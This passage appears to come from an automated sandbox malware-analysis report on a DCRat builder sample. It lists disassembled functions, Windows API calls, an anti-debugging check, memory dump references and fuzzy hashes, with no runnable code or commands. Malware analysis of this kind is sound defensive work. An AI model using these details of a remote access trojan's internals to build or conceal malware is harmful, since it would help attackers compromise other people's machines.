                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                      • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                      • Opcode Fuzzy Hash: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                      • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                      Function 00D7DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                      • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                      • Opcode Fuzzy Hash: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                      • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                      Function 00D7DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      Function 00D7DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      Function 00D7DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                      • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                      • Opcode Fuzzy Hash: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                      • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                      Function 00D7A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • SetCurrentDirectoryW.KERNELBASE(?,00D7A587,C:\Users\user\Desktop,00000000,00DA946A,00000006), ref: 00D7A326
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CurrentDirectory
                      • String ID:
                      • API String ID: 1611563598-0
                      • Opcode ID: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                      • Instruction ID: 8a08b5a57d564e8500a5b26abe9b2534fb3e2802d2375116c05d40432ab9bc58
                      • Opcode Fuzzy Hash: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                      • Instruction Fuzzy Hash: 55A01230194206568A000B30CC09C1576505760702F0086227002C00B0CB308C14A510
                      Function 00D696D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • CloseHandle.KERNELBASE(000000FF,?,?,00D6968F,?,?,?,?,00D91FA1,000000FF), ref: 00D696EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                      • Instruction ID: 6d5e3ad7efe4f4cf3ccb276a0eeef45a40e407189d28ec4767f0450737f96953
                      • Opcode Fuzzy Hash: d4fd659a13ee350ec230100b643c7ac06fa6d95edbc57fcd1cab0298b1949fc8
                      • Instruction Fuzzy Hash: 6DF05E30556B048FDB308A64D569792B7E89B12735F088B1E90EB535A4D771A84D8B20

                      Non-executed Functions

                      Function 00D7B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D7B971
                      • EndDialog.USER32(?,00000006), ref: 00D7B984
                      • GetDlgItem.USER32(?,0000006C), ref: 00D7B9A0
                      • SetFocus.USER32(00000000), ref: 00D7B9A7
                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D7B9E1
                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D7BA18
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7BA2E
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D7BA4C
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BA5C
                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BA78
                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BA94
                      • _swprintf.LIBCMT ref: 00D7BAC4
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D7BAD7
                      • FindClose.KERNEL32(00000000), ref: 00D7BADE
                      • _swprintf.LIBCMT ref: 00D7BB37
                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D7BB4A
                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D7BB67
                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D7BB87
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BB97
                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BBB1
                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BBC9
                      • _swprintf.LIBCMT ref: 00D7BBF5
                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D7BC08
                      • _swprintf.LIBCMT ref: 00D7BC5C
                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D7BC6F
                        • Part of subcall function 00D7A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                        • Part of subcall function 00D7A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                      • API String ID: 797121971-1840816070
                      • Opcode ID: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                      • Instruction ID: 749702fae427d4f4c53517beb40b0c9db68c984970534c8cbbfe34097b30b4ea
                      • Opcode Fuzzy Hash: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                      • Instruction Fuzzy Hash: A5919372248349BFD7219BA0DC49FFB77ACEB49714F04481AF789D2191EB719A048B72
                      Function 00D6718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67191
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D672F1
                      • CloseHandle.KERNEL32(00000000), ref: 00D67301
                        • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                        • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                        • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D6730C
                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D6741A
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D67446
                      • CloseHandle.KERNEL32(?), ref: 00D67457
                      • GetLastError.KERNEL32 ref: 00D67467
                      • RemoveDirectoryW.KERNEL32(?), ref: 00D674B3
                      • DeleteFileW.KERNEL32(?), ref: 00D674DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                      • API String ID: 3935142422-3508440684
                      • Opcode ID: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                      • Instruction ID: 7b579a0730a4de2533f4f96ec41e2eb9d2571d8990716da809bcf73dc630a82a
                      • Opcode Fuzzy Hash: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                      • Instruction Fuzzy Hash: 3BB1C271904219ABDF20DFA4DC45BEEBBB8EF04704F0445A9F949E7242DB34AA49CB71
                      Function 00D63281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog_memcmp
                      • String ID: CMT$h%u$hc%u
                      • API String ID: 3004599000-3282847064
                      • Opcode ID: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                      • Instruction ID: d774385f8733c048206ac937f1803f88f5de1216fc1bc6ade564f34ec8fed213
                      • Opcode Fuzzy Hash: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                      • Instruction Fuzzy Hash: 74328E715147849FDF14DF64C896AEA37A5EF55300F08457EFD8A8B282EB70AA48CB70
                      Function 00D8D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                      • Instruction ID: d70630221f55ae431ec6e807abb848c15090aa03b7b82adb908d4e09870a342c
                      • Opcode Fuzzy Hash: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                      • Instruction Fuzzy Hash: B3C25C71E086288FDB25EF28DD407E9B3B6EB44315F1945EAD44DE7280E774AE818F60
                      Function 00D627E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D627F1
                      • _strlen.LIBCMT ref: 00D62D7F
                        • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,000103F6), ref: 00D71396
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D62EE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                      • String ID: CMT
                      • API String ID: 1706572503-2756464174
                      • Opcode ID: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                      • Instruction ID: 3c7de7424393a65ab9960e32bf7ad876f14a24d50efd784c8da7f17392566433
                      • Opcode Fuzzy Hash: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                      • Instruction Fuzzy Hash: 0D62E2715106848FDF18DF68C8956FA3BE1EF58304F09457EEC9A8B286DB70A949CB70
                      Function 00D8866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D88767
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D88771
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00D8877E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                      • Instruction ID: 3cfe90e04c16ed280d3ff0eee0612e5462055ed4ca8ce13fe0e08e130d8d5f48
                      • Opcode Fuzzy Hash: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                      • Instruction Fuzzy Hash: 4931B5759013289BCB21DF64DC89B9DBBB8EF08310F5041EAE90CA7251EB349B858F55
                      Function 00D8AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: .
                      • API String ID: 0-248832578
                      • Opcode ID: fd58891f45dcbb03820078705dae49c8247f96b6f1df2050b05d3a055f57750d
                      • Instruction ID: dc275711d33a67f89fe7bf3b3cac0470227908b93eeb8ebe06c842e3526346eb
                      • Opcode Fuzzy Hash: fd58891f45dcbb03820078705dae49c8247f96b6f1df2050b05d3a055f57750d
                      • Instruction Fuzzy Hash: 4B31F2718002096BEB24AE7DCC84EEB7BBEDB85314F0801AAF51897251E630AD418B70
                      Function 00D8CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                      • Instruction ID: 38aa944026b58aedc1c4bbaac0279b64a78b62f6d420832ecb8a20ca14034957
